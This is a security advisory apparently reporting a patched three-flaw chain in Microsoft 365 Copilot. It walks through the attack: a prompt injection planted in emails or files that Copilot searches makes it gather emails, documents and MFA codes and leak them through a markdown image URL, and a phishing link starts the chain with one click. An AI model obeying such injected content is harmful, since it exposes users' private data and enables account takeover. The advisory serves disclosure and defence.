Microsoft 365 Copilot 'SearchLeak' CVE-2026-42824 — One-Click Exfiltration of Emails, Files, and MFA Codes

A chain of three vulnerabilities in Microsoft 365 Copilot, collectively tracked as CVE-2026-42824 and dubbed “SearchLeak” by Varonis Threat Labs, could be exploited to silently exfiltrate a victim’s emails, files, and multi-factor authentication codes in a single user interaction: clicking a link. Microsoft patched all three components server-side in mid-June 2026; no action is required from end users or enterprise administrators. The disclosure, however, raises substantive questions about the security model of AI systems granted ambient read access across the entirety of an organisation’s data.

The Attack Chain

The three vulnerabilities combined to form a complete exfiltration path:

Flaw 1 — Prompt injection via search results: Microsoft 365 Copilot’s enterprise search function aggregates content from emails, SharePoint documents, Teams messages, and OneDrive files. An attacker who can place content in any of those locations — including sending an email that lands in the victim’s mailbox — can embed a prompt injection payload in that content. When Copilot retrieves the content to answer a query, the injected instruction executes in the context of Copilot’s processing.

Flaw 2 — Indirect data exfiltration via markdown rendering: The injected prompt instructs Copilot to retrieve sensitive data — emails matching keywords, recently accessed files, MFA codes sent via SMS or email — and include it in a markdown-rendered response that embeds the data inside an image URL request to an attacker-controlled server. The victim’s browser fetches the image, sending the data to the attacker.

Flaw 3 — One-click delivery: The vulnerability could be delivered via a phishing link that triggers the Copilot interaction on behalf of the victim without requiring them to open Copilot themselves. A single click initiates the chain.

Why This Matters Beyond the Patch

Microsoft has resolved all three vulnerabilities; organisations using M365 Copilot are no longer exposed to this specific chain. The more durable concern is architectural.

Copilot operates with access credentials equivalent to the signed-in user’s permissions across the full M365 tenancy — emails, files, Teams conversation history, and in many configurations, inbound MFA codes sent to email. This scope of access was designed to make Copilot maximally useful. It also means that any injection vulnerability in Copilot’s input processing, even transiently, can reach across an organisation’s entire data footprint.

SearchLeak is the fourth published prompt injection attack against M365 Copilot in 2026. Each followed the same structural pattern: ambient data access combined with inadequate input sanitisation creates a reliable exfiltration primitive. Patching the specific chain does not resolve the structural issue, which is that AI systems with broad read permissions are high-value targets for prompt injection regardless of which specific vectors are currently patched.

What Attackers Can Do with This Access

In a successful SearchLeak attack, an adversary could extract:

• Emails matching attacker-specified keywords — contracts, M&A communications, PII, credentials
• MFA codes from authentication emails in the inbox, enabling account takeover without knowing the password
• SharePoint/OneDrive documents identified by the injected search query
• Teams messages from recent conversations

The combination of MFA codes and email content provides a potential path to full account takeover without requiring any credential from the user.

Recommended Actions

• No immediate patching action required — Microsoft resolved all three components server-side. Verify your M365 tenant is current; no administrator action is needed for this specific chain.
• Review Copilot data access scope — assess which sensitivity labels, SharePoint sites, and mailboxes are accessible to Copilot for users in your tenancy. Applying Microsoft Purview sensitivity labels that exclude Copilot from highly confidential content reduces blast radius from future prompt injection chains.
• Enable Microsoft 365 Audit logs — ensure Copilot interactions are logged in the Unified Audit Log for forensic visibility. SearchLeak-style attacks could otherwise be invisible to a security team.
• Monitor for emerging prompt injection disclosures — the pattern of Copilot prompt injection is sufficiently established that future vulnerabilities are probable. Subscribe to MSRC advisories for M365 Copilot specifically.
• Evaluate data access governance before expanding Copilot deployment — if Copilot is in pilot, conduct a permissions audit before rolling out to users with access to privileged financial, legal, or HR data.